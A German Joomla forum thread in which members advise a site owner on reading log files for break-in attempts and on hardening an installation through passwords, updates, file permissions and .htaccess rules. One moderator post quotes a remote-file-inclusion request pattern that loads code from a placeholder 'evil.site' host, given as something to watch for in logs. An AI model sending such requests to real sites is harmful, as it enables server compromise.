+ Antworten
Ergebnis 1 bis 10 von 10

Thema: Frage zur Sicherheit bzw. Analyse

  1. #1
    Kommt häufiger vorbei Avatar von adrianomath
    Registriert seit
    10.07.2008
    Beiträge
    331
    Bedankte sich
    81
    Erhielt 32 Danksagungen
    in 31 Beiträgen

    Standard Frage zur Sicherheit bzw. Analyse

    Ich hab so meine Fragen bezüglich Logfiles.

    Mein Hoster ist 1und1 und ich hab eine MENGE Logfiles.

    Was ist wichtig bzw. auf was muss ich schauen? Wie sehe ich, ob ein Hacker versucht hat, reinzukommen ?? Bitte gebt mir Tipps auf was ich aufpassen muss.

    DANKE

  2. #2
    Moderator Avatar von Lacki
    Registriert seit
    27.04.2006
    Ort
    Direkt um die Ecke
    Beiträge
    8.739
    Bedankte sich
    337
    Erhielt 3.615 Danksagungen
    in 2.974 Beiträgen

    Standard

    Alle Möglichkeiten, wie ein Hacker "hereinkommt", hier aufzuzählen, ist wohl unmöglich. Jede Liste ist unvollständig, da sich "Hacker" immer neue Wege suchen. Generell sind es aber oft solche URL's, in denen andere Parameter vorkommen, als die, die durch Deine Menüs, Module und Komponenten erzeugt werden. Oft kommen dann auch fremde Domains vor, über die Schadcode geladen werden soll nach dem Muster index.php?doexample=evil.site/evil.php.
    Viel wichtiger als die Suche nach solchen "Strings" ist die Absicherung der Joomlainstallation gegen Einbrüche, da die Suche nach solchen Hackversuchen sehr zeitaufwändig sein kann. Diese Zeit kann man besser zur Absicherung nutzen. Dazu gibt es zahlreiche Informationen im Netz und hier im Forum. Die wichtigsten Dinge sind:
    1. gute Passwörter. wie z. B. hkjh9uHJK - Admin, Test, Hund usw. gehören nicht zu den sicheren Passwörtern
    2. Immer aktuelle Erweiterungen nutzen (Und so wenige wie möglich)
    3. Nur die niedrigst nötigen Datei- und Verzeichnisrechte vergeben - 755 für Verzeichnisse und 644 für Dateien sind zu empfehlen, 777 ist fast ein Garant, dass man gehackt wird.
    4. Evt. Schutz des Backends mit .htaccess
    Das ist hier nur die Kurzform, ausführliche Infos im Sichereitsforum.

  3. Erhielt Danksagungen von:


  4. #3
    Kommt häufiger vorbei Avatar von adrianomath
    Registriert seit
    10.07.2008
    Beiträge
    331
    Bedankte sich
    81
    Erhielt 32 Danksagungen
    in 31 Beiträgen

    Standard

    Danke sehr.

    Nur eine Frage zu den Verzeichnissen und dateien.

    Wie muss ich die genau setzen ? Vorallem der images-ordner

  5. #4
    Moderator Avatar von Lacki
    Registriert seit
    27.04.2006
    Ort
    Direkt um die Ecke
    Beiträge
    8.739
    Bedankte sich
    337
    Erhielt 3.615 Danksagungen
    in 2.974 Beiträgen

    Standard

    Wie ich schon schrieb, alle Ordner auf 755, Dateien auf 644. Der images Ordern ist auch nur ein Ordner unter vielen ;-) Falls es damit zu Problemen kommt, melde Dich noch mal. Zur info kannst Du auch diesen Beitrag noch lesen.
    Geändert von Lacki (30.07.2008 um 19:56 Uhr) Grund: Ergänzung

  6. #5
    Moderator Avatar von Lacki
    Registriert seit
    27.04.2006
    Ort
    Direkt um die Ecke
    Beiträge
    8.739
    Bedankte sich
    337
    Erhielt 3.615 Danksagungen
    in 2.974 Beiträgen

    Standard

    Oder war die Frage etwa so gemeint, wie Du vorgehen musst, um die Rechte einzustellen? In der Regel gibt es im FTP Programm dafür eine Möglichkeit. In Filezilla rechte Maustaste auf Datei oder Verzeichniss, dann Dateiattribute, dort kann man es einstellen.

  7. #6
    War schon öfter hier
    Registriert seit
    18.03.2007
    Beiträge
    157
    Bedankte sich
    22
    Erhielt 13 Danksagungen
    in 6 Beiträgen

    Standard hi

    Zitat Zitat von adrianomath Beitrag anzeigen
    Was ist wichtig bzw. auf was muss ich schauen?
    DANKE
    also mit den Verzeichnis Rechten bin ich mir etwas unklar, bei mir müssen die auf 777 stehen. ( J1.5)

    Klar ist das du die configuration.php im Root Verzeichnis auf jeden Fall nach dem Einrichten auf 444/644 stellen solltest.
    wenn dein Hoster den mod_rewrite unterstützt dann ( nur dann ) die htaccess.text Datei ( im Root) in .htaccess umbenennen.
    Und klar ist das dein Admin Log in Name ( anfangs admin ) bei Benutzer geändert werden sollte. Wie gesagt gute Passwörter sind min 8 stellig mit Groß und Kleinschreibung, Zahlen und Sonderzeichen. Du kannst auch wenn du vergesslich bist ein Gedicht oder liedstrophe nehmen und immer die ersten 2 Buchstaben der Wörter nehmen.



    gruß


    flockerl
    Ich höre und ich vergesse, Ich sehe und ich erinnere mich, Ich tue und ich verstehe !

  8. #7
    Wohnt hier
    Registriert seit
    01.05.2007
    Ort
    Lingen
    Beiträge
    2.576
    Bedankte sich
    6
    Erhielt 837 Danksagungen
    in 793 Beiträgen

    Standard

    @flockerl
    Dateirechte dürfen NIEMALS auf 777 stehen, Ordner 755 und Dateien 644. Mehr Rechte brauchen die nicht. Falls es bei deinem Webhoster nicht anders geht leidest du unter dem wwwrun Problem(Forumsuche nutzen) abhilfe schafft hier die FTP-Funktion oder zu einem vernünftigen Webhoster wechseln.

    Die htaccess wird dann benötigt falls du SEO-URL´s aktiviert hast und dein Webhoster mod_rewrite unterstützt, dies hat mit der Sicherheit aber nichts zu tun.
    Meine Antwort war hilfreich? Dann würde ich mich über einen Click auf Danke sehr freuen
    Kein kostenloser Support per PN

  9. #8
    Joomla Guru Avatar von elkuku
    Registriert seit
    14.06.2006
    Ort
    Guayaquil - Südamerika
    Beiträge
    1.689
    Bedankte sich
    74
    Erhielt 517 Danksagungen
    in 397 Beiträgen

    Standard

    Zitat Zitat von Derroylo Beitrag anzeigen
    Die htaccess wird dann benötigt falls du SEO-URL´s aktiviert hast und dein Webhoster mod_rewrite unterstützt, dies hat mit der Sicherheit aber nichts zu tun.
    Ist nicht ganz richtig... ich zitiere mal aus der .htaccess:
    Rewrite rules to block out some common exploits
    ## If you experience problems on your site block out the operations listed below
    ## This attempts to block the most common type of exploit `attempts` to Joomla!
    sprich: man sollte die .htaccess auch verwenden, wenn man keine SEFlinks hat (mod_rewrite muss natürlich trotzdem geladen sein..)
    Gruß,
    Nikolai
    Hilf mit: Deutsche Joomla! Dokumentation Help testing: EasyCreator Noch Fragen ? Forum.Joomla-Nafu.de

  10. #9
    War schon öfter hier Avatar von satriani-vai
    Registriert seit
    31.01.2008
    Beiträge
    199
    Bedankte sich
    19
    Erhielt 8 Danksagungen
    in 8 Beiträgen

    Ausrufezeichen

    Sehr wichtig !!!
    man muss in der Lage sein .htaccess und htaccess.txt von einander zu unterscheiden
    Gruß, Alex.

    Möge die SuFu mit dir sein

  11. #10
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Zitat Zitat von elkuku Beitrag anzeigen
    Ist nicht ganz richtig... ich zitiere mal aus der .htaccess:
    Rewrite rules to block out some common exploits
    ## If you experience problems on your site block out the operations listed below
    ## This attempts to block the most common type of exploit `attempts` to Joomla!
    sprich: man sollte die .htaccess auch verwenden, wenn man keine SEFlinks hat (mod_rewrite muss natürlich trotzdem geladen sein..)
    Hmmm, wobei ich der Meinung bin, daß diese Einträge allenfalls kosmetischen Charakter haben. Normalerweise sollte das der Hoster (schon aus Eigeninteresse) mit seinen Servereinstellungen abbügeln.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein